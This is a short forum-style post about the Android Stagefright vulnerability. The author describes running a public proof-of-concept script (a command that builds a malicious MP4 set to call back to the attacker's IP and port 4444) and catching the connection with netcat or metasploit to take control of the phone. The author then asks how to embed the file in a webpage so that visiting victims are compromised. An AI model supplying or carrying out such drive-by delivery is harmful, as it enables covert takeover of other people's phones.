I've been doing a lot of research on Stagefright lately and it has been confirmed that many phone models running Android Lollipop and below are susceptible to the exploit.
So since my S3 did indeed turn out to be vulnerable to the exploit having used Zimperium's Stagefright Detector App I decided to put it to the test.
I downloaded Joshua Drake's stagefright code (mp4.py) and managed to successfully craft the malicious MP4 file by running:
python mp4.py -c 192.168.x.x -p 4444
c for LAN IP
p for port number
Now a lot of tutorials online say that before sending the MP4 file via MMS to the target phone I must setup a backdoor using netcat. However I have found that creating a backdoor using metasploit is far more effective in gaining full control over the phone.
I've heard that you could also embed the MP4 or other multimedia files to a webpage such that when a victim visits the webpage you could gain full control over the phone in the same way as mentioned above.
So how could this be achieved?